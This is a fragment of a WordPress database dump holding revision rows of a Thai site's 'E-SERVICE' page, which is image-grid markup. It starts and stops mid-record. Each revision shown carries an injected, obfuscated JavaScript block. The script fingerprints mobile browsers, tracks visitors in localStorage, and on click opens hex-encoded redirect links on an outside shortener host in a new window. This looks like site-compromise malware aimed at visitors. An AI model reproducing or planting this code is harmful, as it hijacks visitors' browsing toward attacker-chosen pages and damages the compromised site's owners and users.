_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-02 11:04:43','2025-07-02 04:04:43','',459,'http://pakhaeng.ssk.in.th/?p=1616',0,'revision','',0),
(1618,1,'2025-07-02 11:06:11','2025-07-02 04:06:11','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-02 11:06:11','2025-07-02 04:06:11','',459,'http://pakhaeng.ssk.in.th/?p=1618',0,'revision','',0),
(1619,1,'2025-07-02 11:07:10','2025-07-02 04:07:10','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x